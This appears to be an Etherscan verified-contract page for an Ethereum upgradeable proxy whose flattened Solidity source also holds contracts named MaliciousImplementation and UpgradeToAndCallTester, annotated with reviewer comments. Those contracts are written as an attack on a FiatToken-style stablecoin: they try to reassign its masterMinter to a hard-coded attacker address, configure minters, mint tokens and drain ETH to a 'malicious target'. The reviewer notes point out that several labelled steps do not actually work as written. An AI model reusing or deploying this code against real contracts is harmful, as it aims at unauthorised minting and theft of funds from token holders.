ETH Balance
0 ETH
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.
Contract Source Code Verified (Exact Match)
Contract Name:
UpgradeableProxy
Compiler Version
v0.8.28+commit.7893614a
Contract Source Code (Solidity)
/**
 *Submitted for verification at Etherscan.io on 2024-11-29
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

// NOTE(review): this page lists UpgradeableProxy as the verified contract
// name, and the ABI shown on the page contains only its members. The two
// other contracts below come from the same flattened file; the page shows
// no deployment of them.

// Proxy contract for upgradeability
//
// NOTE(review): `implementation` and `owner` are ordinary state variables in
// the first storage slots, not dedicated EIP-1967-style slots. Code run via
// delegatecall shares this storage, so an implementation's own leading state
// variables alias these two fields.
// NOTE(review): `owner` is a single address with immediate, unrestricted
// upgrade power: no timelock, no two-step transfer, and no way to change the
// owner from this contract's own functions.
contract UpgradeableProxy {
    address public implementation; // delegatecall target used by fallback()
    address public owner;          // set once to the deployer in the constructor

    event Upgraded(address indexed newImplementation);
    event CallResult(bool success, bytes result);

    // Records the initial implementation and makes the deployer the owner.
    // No check that `_implementation` is non-zero or holds code.
    constructor(address _implementation) {
        implementation = _implementation;
        owner = msg.sender;
    }

    // Forwards any call with non-matching calldata to `implementation` via
    // delegatecall, for any caller.
    // - A low-level delegatecall does not check that the target has code; a
    //   call to a code-less address reports success with empty return data.
    // - The return data is only emitted in CallResult, never returned to the
    //   caller, so callers cannot read results through this proxy.
    fallback() external payable {
        (bool success, bytes memory result) = implementation.delegatecall(msg.data);
        require(success, "Delegatecall failed");
        emit CallResult(success, result);
    }

    // Plain ETH transfers (empty calldata).
    // - The balance check cannot fail: address(this).balance already includes
    //   msg.value when this body runs.
    // - upgradeTo() is an internal call here, so msg.sender is unchanged. The
    //   branch is entered only when msg.sender != owner, and upgradeTo()
    //   requires msg.sender == owner, so every non-zero transfer from a
    //   non-owner reverts with "Not authorized".
    // - Transfers from the owner, and zero-value transfers, are accepted and
    //   do nothing else.
    receive() external payable {
        if (msg.value > 0 && msg.sender != owner) {
            require(address(this).balance >= msg.value, "Insufficient balance");
            upgradeTo(implementation); // Upgrade using current implementation as the placeholder
        }
    }

    // Owner-only: replaces the delegatecall target and emits Upgraded.
    // The new address is not validated (zero address and code-less addresses
    // are accepted).
    function upgradeTo(address _implementation) public {
        require(msg.sender == owner, "Not authorized");
        implementation = _implementation;
        emit Upgraded(_implementation);
    }
}

// Malicious implementation contract
//
// NOTE(review): the name `maliciousTarget` is used in three roles below: the
// only caller allowed to run takeOwnership(), the contract that receives the
// admin calls, and the recipient of forwarded ETH.
// NOTE(review): `proxyOwner` and `maliciousTarget` occupy the same leading
// storage positions as UpgradeableProxy's `implementation` and `owner`. If
// this code ran via that proxy's delegatecall, it would read and write the
// proxy's fields under these names.
// NOTE(review): the signatures called below (updateMasterMinter,
// configureMinter, mint) match the admin/minter interface of FiatToken-style
// stablecoin contracts. That is presumably the intended kind of target; the
// page identifies none.
contract MaliciousImplementation {
    address public proxyOwner;      // caller allowed to use the functions below
    address public maliciousTarget; // see the role note above

    // Stores both addresses as given; no validation.
    constructor(address _proxyOwner, address _maliciousTarget) {
        proxyOwner = _proxyOwner;
        maliciousTarget = _maliciousTarget;
    }

    // Hijack ownership of the proxy contract
    // NOTE(review): the body only overwrites this contract's own `proxyOwner`
    // (or, under delegatecall, the caller's first storage slot). It makes no
    // call to any proxy.
    function takeOwnership() external {
        require(msg.sender == maliciousTarget, "Not authorized");
        proxyOwner = maliciousTarget;
    }

    // Function to set the masterMinter to the attacker's address (dynamically set)
    // NOTE(review): the address is a hard-coded literal, not dynamic. The same
    // address appears on this page as the proxy's decoded constructor
    // argument `_implementation`.
    // This is a regular call, so the target sees this contract as msg.sender.
    // It reverts unless the target's own access control accepts this
    // contract's address.
    function setMasterMinter() external {
        require(msg.sender == proxyOwner, "Not authorized");

        // Dynamically set the masterMinter to the attacker's address (hardcoded here)
        address attackerAddress = 0x471aABd39E9aFa5F4798FC04be77C1cF587FB940;

        (bool success, ) = maliciousTarget.call(
            abi.encodeWithSignature("updateMasterMinter(address)", attackerAddress)
        );
        require(success, "setMasterMinter failed");
    }

    // Function to configure the attacker as a minter
    // Caller-supplied `_minter` and `_allowedAmount` are passed through
    // unchanged. Success depends on the target authorizing this contract.
    function configureMinter(address _minter, uint256 _allowedAmount) external {
        require(msg.sender == proxyOwner, "Not authorized");

        // Call the victim contract's configureMinter function
        (bool success, ) = maliciousTarget.call(
            abi.encodeWithSignature("configureMinter(address,uint256)", _minter, _allowedAmount)
        );
        require(success, "configureMinter failed");
    }

    // Mint tokens to the attacker's address
    // Caller-supplied `_to` and `_amount` are passed through unchanged.
    // Success depends on the target authorizing this contract.
    function mint(address _to, uint256 _amount) external {
        require(msg.sender == proxyOwner, "Not authorized");

        // Call the victim contract's mint function
        (bool success, ) = maliciousTarget.call(
            abi.encodeWithSignature("mint(address,uint256)", _to, _amount)
        );
        require(success, "Mint failed");
    }

    // Accepts any unmatched call, with or without ETH, and does nothing.
    fallback() external payable {}

    // On a non-zero plain transfer from anyone except `proxyOwner`, forwards
    // the contract's entire balance to `maliciousTarget`. `transfer` passes
    // only the 2300-gas stipend and reverts the whole call if the recipient
    // cannot accept it.
    receive() external payable {
        if (msg.value > 0 && msg.sender != proxyOwner) {
            address payable target = payable(maliciousTarget);
            uint256 balance = address(this).balance;
            if (balance > 0) {
                target.transfer(balance); // Drain all funds to the malicious target
            }
        }
    }
}

// Exploit contract to interact with the vulnerable upgradeToAndCall functionality
//
// NOTE(review): no function here calls upgradeToAndCall, and the contract
// stores no proxy address. As written, the observable effects are event
// emission and forwarding of this contract's ETH to `maliciousTarget`.
contract UpgradeToAndCallTester {
    address public owner;           // deployer
    address public maliciousTarget; // recipient of all forwarded ETH

    event FallbackCalled(address indexed caller, bytes data);
    event CallResult(bool success, bytes result);

    // Makes the deployer the owner and stores the recipient address.
    constructor(address _maliciousTarget) {
        owner = msg.sender;
        maliciousTarget = _maliciousTarget;
    }

    // Owner-only selfdestruct that sends the balance to the owner.
    // NOTE(review): where EIP-6780 is active, selfdestruct outside the
    // creation transaction only transfers the balance and leaves code and
    // storage in place. Confirm for the chain in question.
    function destroy() external {
        require(msg.sender == owner, "Not authorized");
        selfdestruct(payable(msg.sender));
    }

    // Logs the caller and calldata of any unmatched call; accepts ETH.
    fallback() external payable {
        emit FallbackCalled(msg.sender, msg.data);
    }

    // On a non-zero plain transfer from anyone except the owner, forwards the
    // contract's entire balance to `maliciousTarget` via drainFunds().
    receive() external payable {
        if (msg.value > 0 && msg.sender != owner) {
            drainFunds(payable(maliciousTarget)); // Transfer Ether to malicious target
        }
    }

    // Owner-only entry point; requires recursiveDepth > 0. Runs the three
    // internal helpers in order. drainFunds() reverts with "No funds to drain"
    // if the contract holds no ETH (msg.value counts toward the balance).
    function complexOperation(uint256 recursiveDepth) external payable {
        require(msg.sender == owner, "Not authorized");
        require(recursiveDepth > 0, "Depth must be greater than zero");

        upgradeProxyToMalicious();
        drainFunds(payable(maliciousTarget));
        recursiveExploit(recursiveDepth);
    }

    // NOTE(review): the call is addressed to this contract itself, which
    // defines no upgradeTo function. It therefore lands in fallback(), emits
    // FallbackCalled and returns success. No proxy is contacted.
    function upgradeProxyToMalicious() internal {
        (bool success, ) = address(this).call(
            abi.encodeWithSignature("upgradeTo(address)", address(this))
        );
        require(success, "Upgrade to malicious contract failed");
        emit CallResult(success, "");
    }

    // Sends the contract's whole balance to `_to` with a low-level call that
    // forwards all remaining gas. Reverts on zero balance or a failed transfer.
    function drainFunds(address payable _to) internal {
        uint256 balance = address(this).balance;
        require(balance > 0, "No funds to drain");

        (bool success, ) = _to.call{value: balance}("");
        require(success, "Fund transfer failed");
        emit CallResult(success, "");
    }

    // NOTE(review): this function is internal, so it has no external
    // selector. The self-delegatecall falls into fallback(), emits
    // FallbackCalled once and returns. No recursion takes place, whatever the
    // value of `depth`.
    function recursiveExploit(uint256 depth) internal {
        if (depth == 0) return;

        (bool success, ) = address(this).delegatecall(
            abi.encodeWithSignature("recursiveExploit(uint256)", depth - 1)
        );
        require(success, "Recursive call failed");
    }
}
[{"inputs":[{"internalType":"address","name":"_implementation","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"success","type":"bool"},{"indexed":false,"internalType":"bytes","name":"result","type":"bytes"}],"name":"CallResult","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newImplementation","type":"address"}],"name":"Upgraded","type":"event"},{"stateMutability":"payable","type":"fallback"},{"inputs":[],"name":"implementation","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_implementation","type":"address"}],"name":"upgradeTo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
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
Deployed Bytecode
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
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000471aabd39e9afa5f4798fc04be77c1cf587fb940
-----Decoded View---------------
Arg [0] : _implementation (address): 0x471aABd39E9aFa5F4798FC04be77C1cF587FB940
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000471aabd39e9afa5f4798fc04be77c1cf587fb940
Deployed Bytecode Sourcemap
99:1046:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;708:1;696:9;:13;:36;;;;;727:5;;;;;;;;;;;713:19;;:10;:19;;;;696:36;692:235;;;782:9;757:21;:34;;749:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;831:25;841:14;;;;;;;;;;;831:9;:25::i;:::-;692:235;99:1046;;471:12;485:19;508:14;;;;;;;;;;;:27;;536:8;;508:37;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;470:75;;;;564:7;556:39;;;;;;;;;;;;:::i;:::-;;;;;;;;;611:27;622:7;631:6;611:27;;;;;;;:::i;:::-;;;;;;;;459:187;942:200;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;132:29;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;168:20;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;942:200;1026:5;;;;;;;;;;;1012:19;;:10;:19;;;1004:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;1078:15;1061:14;;:32;;;;;;;;;;;;;;;;;;1118:15;1109:25;;;;;;;;;;;;942:200;:::o;132:29::-;;;;;;;;;;;;;:::o;168:20::-;;;;;;;;;;;;;:::o;7:169:1:-;91:11;125:6;120:3;113:19;165:4;160:3;156:14;141:29;;7:169;;;;:::o;182:170::-;322:22;318:1;310:6;306:14;299:46;182:170;:::o;358:366::-;500:3;521:67;585:2;580:3;521:67;:::i;:::-;514:74;;597:93;686:3;597:93;:::i;:::-;715:2;710:3;706:12;699:19;;358:366;;;:::o;730:419::-;896:4;934:2;923:9;919:18;911:26;;983:9;977:4;973:20;969:1;958:9;954:17;947:47;1011:131;1137:4;1011:131;:::i;:::-;1003:139;;730:419;;;:::o;1155:147::-;1256:11;1293:3;1278:18;;1155:147;;;;:::o;1308:148::-;1406:6;1401:3;1396;1383:30;1447:1;1438:6;1433:3;1429:16;1422:27;1308:148;;;:::o;1484:327::-;1598:3;1619:88;1700:6;1695:3;1619:88;:::i;:::-;1612:95;;1717:56;1766:6;1761:3;1754:5;1717:56;:::i;:::-;1798:6;1793:3;1789:16;1782:23;;1484:327;;;;;:::o;1817:291::-;1957:3;1979:103;2078:3;2069:6;2061;1979:103;:::i;:::-;1972:110;;2099:3;2092:10;;1817:291;;;;;:::o;2114:169::-;2254:21;2250:1;2242:6;2238:14;2231:45;2114:169;:::o;2289:366::-;2431:3;2452:67;2516:2;2511:3;2452:67;:::i;:::-;2445:74;;2528:93;2617:3;2528:93;:::i;:::-;2646:2;2641:3;2637:12;2630:19;;2289:366;;;:::o;2661:419::-;2827:4;2865:2;2854:9;2850:18;2842:26;;2914:9;2908:4;2904:20;2900:1;2889:9;2885:17;2878:47;2942:131;3068:4;2942:1
31;:::i;:::-;2934:139;;2661:419;;;:::o;3086:90::-;3120:7;3163:5;3156:13;3149:21;3138:32;;3086:90;;;:::o;3182:109::-;3263:21;3278:5;3263:21;:::i;:::-;3258:3;3251:34;3182:109;;:::o;3297:98::-;3348:6;3382:5;3376:12;3366:22;;3297:98;;;:::o;3401:168::-;3484:11;3518:6;3513:3;3506:19;3558:4;3553:3;3549:14;3534:29;;3401:168;;;;:::o;3575:139::-;3664:6;3659:3;3654;3648:23;3705:1;3696:6;3691:3;3687:16;3680:27;3575:139;;;:::o;3720:102::-;3761:6;3812:2;3808:7;3803:2;3796:5;3792:14;3788:28;3778:38;;3720:102;;;:::o;3828:373::-;3914:3;3942:38;3974:5;3942:38;:::i;:::-;3996:70;4059:6;4054:3;3996:70;:::i;:::-;3989:77;;4075:65;4133:6;4128:3;4121:4;4114:5;4110:16;4075:65;:::i;:::-;4165:29;4187:6;4165:29;:::i;:::-;4160:3;4156:39;4149:46;;3918:283;3828:373;;;;:::o;4207:407::-;4340:4;4378:2;4367:9;4363:18;4355:26;;4391:65;4453:1;4442:9;4438:17;4429:6;4391:65;:::i;:::-;4503:9;4497:4;4493:20;4488:2;4477:9;4473:18;4466:48;4531:76;4602:4;4593:6;4531:76;:::i;:::-;4523:84;;4207:407;;;;;:::o;4701:117::-;4810:1;4807;4800:12;4947:126;4984:7;5024:42;5017:5;5013:54;5002:65;;4947:126;;;:::o;5079:96::-;5116:7;5145:24;5163:5;5145:24;:::i;:::-;5134:35;;5079:96;;;:::o;5181:122::-;5254:24;5272:5;5254:24;:::i;:::-;5247:5;5244:35;5234:63;;5293:1;5290;5283:12;5234:63;5181:122;:::o;5309:139::-;5355:5;5393:6;5380:20;5371:29;;5409:33;5436:5;5409:33;:::i;:::-;5309:139;;;;:::o;5454:329::-;5513:6;5562:2;5550:9;5541:7;5537:23;5533:32;5530:119;;;5568:79;;:::i;:::-;5530:119;5688:1;5713:53;5758:7;5749:6;5738:9;5734:22;5713:53;:::i;:::-;5703:63;;5659:117;5454:329;;;;:::o;5789:118::-;5876:24;5894:5;5876:24;:::i;:::-;5871:3;5864:37;5789:118;;:::o;5913:222::-;6006:4;6044:2;6033:9;6029:18;6021:26;;6057:71;6125:1;6114:9;6110:17;6101:6;6057:71;:::i;:::-;5913:222;;;;:::o;6141:164::-;6281:16;6277:1;6269:6;6265:14;6258:40;6141:164;:::o;6311:366::-;6453:3;6474:67;6538:2;6533:3;6474:67;:::i;:::-;6467:74;;6550:93;6639:3;6550:93;:::i;:::-;6668:2;6663:3;6659:12;6652:19;;6311:366;;;:::o;6683:419::-;6849:4;6887:2;6876:9;6872:18;6864:26
;;6936:9;6930:4;6926:20;6922:1;6911:9;6907:17;6900:47;6964:131;7090:4;6964:131;:::i;:::-;6956:139;;6683:419;;;:::o
Swarm Source
ipfs://59b73a77e2aedf4a0f8162da0f1283d0f9dfa67837f7722ae44957d4eb40cc23